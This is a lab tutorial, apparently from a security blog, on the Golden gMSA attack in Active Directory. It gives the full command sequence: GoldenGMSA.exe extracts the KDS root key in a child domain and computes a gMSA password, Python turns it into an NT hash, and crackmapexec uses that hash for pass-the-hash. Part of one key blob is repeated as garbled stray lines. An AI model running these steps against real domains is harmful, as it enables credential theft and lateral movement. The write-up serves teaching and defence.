Golden gMSA Attacks

Group Managed Service Accounts (gMSA) are domain accounts where the passwords are automatically managed by Active Directory. gMSA account use 240 byte randomly generated passwords, which are automatically cycled every 30 days.

The computer account that is authorised to read the gMSA password can do so by reading the msDS-ManagedPassword attribute in Active Directory.

In this article, we’re going to be looking at attacking gMSA accounts from a child domain. The following systems are used;

  • DC01.bordergate.local – forest root (parent domain) for bordergate.local
  • SERVER1.bordergate.local – A server in the bordergate.local domain.
  • CDC01.child.bordergate.local – A domain controller in a child domain of bordergate.local

Configuring gMSA Accounts

In the parent domain, use the following PowerShell commands to create the gMSA account.

# Generate a new root key for the Microsoft Group Key Distribution Service (KdsSvc). Avoid waiting 10 hours.
PS C:\Users\Administrator> Add-KdsRootKey -EffectiveTime ((get-date) addhours(-10))

# Create a group, and add a member server that will use a gMSA
PS C:\Users\Administrator> New-ADGroup -Name gMSAGroup -GroupScope DomainLocal
PS C:\Users\Administrator> Add-ADGroupMember -Identity gMSAGroup -Members SERVER1$

# Create the gMSA and assign it to the group
PS C:\Users\Administrator> New-ADServiceAccount gmsa1  -DNSHostname gmsa1.bordergate.local -PrincipalsAllowedToRetrieveManagedPassword gMSAGroup -PrincipalsAllowedToDelegateToAccount gMSAGroup

Next, reboot the server which will use the gMSA (SERVER1 in this case), and run the following commands;

# Make sure RSAT tool are installed
PS C:\Users\Administrator> Install-WindowsFeature RSAT-AD-PowerShell
Success Restart Needed Exit Code      Feature Result
------- -------------- ---------      --------------
True    No             Success        {Remote Server Administration Tools, Activ...
# Install the account and test it
PS C:\Users\Administrator.BORDERGATE> Install-ADServiceAccount -Identity gmsa1
PS C:\Users\Administrator.BORDERGATE> Test-ADServiceAccount gmsa1

The GMSA account should now be available for use in applications like IIS and MsSQL.

The Attack

If the Key Distribution Service root key is compromised, an adversary can determine all gMSA passwords which are derived from it. The KDS root key is replicated between domains within a forest. As such, if an adversary compromises a child domain they can extract the root key.

The following application can be used to perform the attack; https://github.com/Semperis/GoldenGMSA. For the attack to work, we either need to be logged in as a Domain Administrator (of the child domain), or the computer account of the child domain.

First, in the child domain we extract the KDS root key;

C:\Users\Administrator\Desktop> echo %USERDOMAIN%
CHILD
C:\Users\Administrator\Desktop> hostname
CDC01
C:\Users\Administrator\Desktop> GoldenGMSA.exe kdsinfo --forest child.bordergate.local
 
Guid:           a3a4ed04-9a6f-9365-ab81-d20e52dd374f
Base64 blob:    AQAAAATtpKNvmmWTq4HSDlLdN08AAAAAAQAAAAAAAAAkAAAAUwBQADgAMAAwAF8AMQAwADgAXwBDAFQAUgBfAEgATQBBAEMAHgAAAAAAAAABAAAADgAAAAAAAABTAEgAQQA1ADEAMgAAAAAAAAAEAAAARABIAAwCAAAMAgAAREhQTQABAACHqOYdtLZmPP+70ZxlGVmZjO72CGYN0PJdLO7UQ147AOAN+PHWGVfU+vffRWGyqjAWw9kRNAlvqjv0KW2DDpp8IJ4MZJdRer1aip0wa89n7ZH55nJbR1jAIuCx70J1v3tsW/wR1F+QiLlB9U6x5Zu4vDmgvxIwf1xP23DFgbI/drY6yuHKpreQLVJSZzVIig7xPG2aUb+kqzrYNHeWUk2O9qFntaQYJdln4UTlFAVkJRzKy4PmtIb2s8o/eXFQYCbAuFf2iZYoVt7UAQq9C+Yhw6OWClTnEMN18mN11wFBA6S1QzDBmK8SYRbSJ24RcV9pOHf61+8JytsJSukeGhWXP7Msm3MTTQsud1BmYO29SEynsY8h7yBUB/R5OhoLoSUQ28FQd75GP/9P7UqsC7VVvjpsGwxrR7G8N3O/foxvYpASKPjCjLsYpVrjE0EACmUBlvkxx3pX8t30Y+Xp7BRLd33mKqq4qGKKw3bSgtbtOGTmeYJCjryDHRQ0j28vkZO1BFrydnFk4d/JZ8H7Py5VpL0b/+g7nIDQUrmF0YLqCtsqO3MT0/4UyEhLHgUliLm30rvS3wFhmezQbhVXzQkVszU7u2Tg7Dd/0Cg3DfkrUseJFCjNxn62GEtSPR2yRsMvYweEkPAO+NZH0UjUeVRRXiMnz++YxYJmS0wPbMQWWQACAAAACAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAGgAAABDAE4APQBEAEMAMAAxACwATwBVAD0ARABvAG0AYQBpAG4AIABDAG8AbgB0AHIAbwBsAGwAZQByAHMALABEAEMAPQBiAG8AcgBkAGUAcgBnAGEAdABlACwARABDAD0AbABvAGMAYQBsAND+fYTTUdoBuFyDsn9R2gEAAAAAAAAAAEAAAAAAAAAA/ACXmfbkrF3+wijRGR4s4YyrntDTApi5okeZBs0TOQrm07kjXivWAEnX9N4ChSKODvbvwU//D4Z1pwOWeWkcTg==

Next, we need to gather some details of the service account we will target. In this instance, only one account is configured;

 GoldenGMSA.exe gmsainfo -d bordergate.local
 
sAMAccountName:         gmsa1$
objectSid:                      S-1-5-21-678665010-2561942565-514098031-1109
rootKeyGuid:            a3a4ed04-9a6f-9365-ab81-d20e52dd374f
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAagEAAAUAAAAKAAAABO2ko2+aZZOrgdIOUt03TwAAAAAiAAAAIgAAAGIAbwByAGQAZQByAGcAYQB0AGUALgBsAG8AYwBhAGwAAABiAG8AcgBkAGUAcgBnAGEAdABlAC4AbABvAGMAYQBsAAAA

Next, we can use the gathered details with the KDS key to generate a password for the account.

GoldenGMSA.exe compute --sid S-1-5-21-678665010-2561942565-514098031-1109 --pwdid AQAAAEtEU0sCAAAAagEAAAUAAAAKAAAABO2ko2+aZZOrgdIOUt03TwAAAAAiAAAAIgAAAGIAbwByAGQAZQByAGcAYQB0AGUALgBsAG8AYwBhAGwAAABiAG8AcgBkAGUAcgBnAGEAdABlAC4AbABvAGMAYQBsAAAA --kdskey AQAAAATtpKNvmmWTq4HSDlLdN08AAAAAAQAAAAAAAAAkAAAAUwBQADgAMAAwAF8AMQAwADgAXwBDAFQAUgBfAEgATQBBAEMAHgAAAAAAAAABAAAADgAAAAAAAABTAEgAQQA1ADEAMgAAAAAAAAAEAAAARABIAAwCAAAMAgAAREhQTQABAACHqOYdtLZmPP+70ZxlGVmZjO72CGYN0PJdLO7UQ147AOAN+PHWGVfU+vffRWGyqjAWw9kRNAlvqjv0KW2DDpp8IJ4MZJdRer1aip0wa89n7ZH55nJbR1jAIuCx70J1v3tsW/wR1F+QiLlB9U6x5Zu4vDmgvxIwf1xP23DFgbI/drY6yuHKpreQLVJSZzVIig7xPG2aUb+kqzrYNHeWUk2O9qFntaQYJdln4UTlFAVkJRzKy4PmtIb2s8o/eXFQYCbAuFf2iZYoVt7UAQq9C+Yhw6OWClTnEMN18mN11wFBA6S1QzDBmK8SYRbSJ24RcV9pOHf61+8JytsJSukeGhWXP7Msm3MTTQsud1BmYO29SEynsY8h7yBUB/R5OhoLoSUQ28FQd75GP/9P7UqsC7VVvjpsGwxrR7G8N3O/foxvYpASKPjCjLsYpVrjE0EACmUBlvkxx3pX8t30Y+Xp7BRLd33mKqq4qGKKw3bSgtbtOGTmeYJCjryDHRQ0j28vkZO1BFrydnFk4d/JZ8H7Py5VpL0b/+g7nIDQUrmF0YLqCtsqO3MT0/4UyEhLHgUliLm30rvS3wFhmezQbhVXzQkVszU7u2Tg7Dd/0Cg3DfkrUseJFCjNxn62GEtSPR2yRsMvYweEkPAO+NZH0UjUeVRRXiMnz++YxYJmS0wPbMQWWQACAAAACAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAGgAAABDAE4APQBEAEMAMAAxACwATwBVAD0ARABvAG0AYQBpAG4AIABDAG8AbgB0AHIAbwBsAGwAZQByAHMALABEAEMAPQBiAG8AcgBkAGUAcgBnAGEAdABlACwARABDAD0AbABvAGMAYQBsAND+fYTTUdoBuFyDsn9R2gEAAAAAAAAAAEAAAAAAAAAA/ACXmfbkrF3+wijRGR4s4YyrntDTApi5okeZBs0TOQrm07kjXivWAEnX9N4ChSKODvbvwU//D4Z1pwOWeWkcTg==
zQkVszU7u2Tg7Dd/0Cg3DfkrUseJFCjNxn62GEtSPR2yRsMvYweEkPAO+NZH0UjUeVRRXiMnz++YxYJmS0wPbMQWWQACAAAACAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAGgAAABDAE4APQBEAEMAMAAxACwATwBVAD0ARABvAG0AYQBpAG4AIABDAG8AbgB0AHIAbwBsAGwAZQByAHMALABEAEMAPQBiAG8AcgBkAGUAcgBnAGEAdABlACwARABDAD0AbABvAGMAYQBsAND+fYTTUdoBuFyDsn9R2gEAAAAAAAAAAEAAAAAAAAAA/ACXmfbkrF3+wijRGR4s4YyrntDTApi5okeZBs0TOQrm07kjXivWAEnX9N4ChSKODvbvwU//D4Z1pwOWeWkcTg==

Base64 Encoded Password:        IC7RDElLHdcPZDQ3gXNU8RVwR4Zj4vbiwdK/j/zTIwMfpDemMUvJ1aRUdNxcQk0vH5Q5kIZFypsz1v+6pvziAnn38SKLv5TVl78BRz3L4wOUuLEZiuQ0pxF602BJJlALhFSgLjrU5WejfOIiPQpUpRlcIHWmStCwPmP8KRBJThSiZOlM9xTMUCZp0lRIuJ2X9mc+RK1u1D4luRCzqGoYhGXS8PVwdXXPRJHRr6FEWj2X4hJc6dYkr3RzCs7tENVdeRvkQZ/x1T9f5GrqkC6tTSrtMA7EFwTxY7pIuOhpC2MAGYXAYg1+F5muYwSei7tSZESKrDOOUpjATxatQKURbg==

The password is Base64 encoded since it will contain non printable characters. To get around this, we can calculate the NT hash for the account.

import base64
import hashlib

base64_input  = "IC7RDElLHdcPZDQ3gXNU8RVwR4Zj4vbiwdK/j/zTIwMfpDemMUvJ1aRUdNxcQk0vH5Q5kIZFypsz1v+6pvziAnn38SKLv5TVl78BRz3L4wOUuLEZiuQ0pxF602BJJlALhFSgLjrU5WejfOIiPQpUpRlcIHWmStCwPmP8KRBJThSiZOlM9xTMUCZp0lRIuJ2X9mc+RK1u1D4luRCzqGoYhGXS8PVwdXXPRJHRr6FEWj2X4hJc6dYkr3RzCs7tENVdeRvkQZ/x1T9f5GrqkC6tTSrtMA7EFwTxY7pIuOhpC2MAGYXAYg1+F5muYwSei7tSZESKrDOOUpjATxatQKURbg=="
print(hashlib.new("md4", base64.b64decode(base64_input)).hexdigest())

With the NT hash calculated, we can then verify the credential is working correctly.

crackmapexec smb 192.168.1.198 -u 'gmsa1$' -H 9d98a5586932c24eaf5c221c5780ce7d
SMB         192.168.1.198   445    SERVER1          [*] Windows 10.0 Build 20348 x64 (name:SERVER1) (domain:bordergate.local) (signing:False) (SMBv1:False)
SMB         192.168.1.198   445    SERVER1          [+] bordergate.local\gmsa1$:9d98a5586932c24eaf5c221c5780ce7d (Pwn3d!)

In Conclusion

gMSA accounts assist in preventing Kerberoasting and other brute force attacks. The Golden gMSA attacks highlight the fact that domains should not be considered trust boundaries.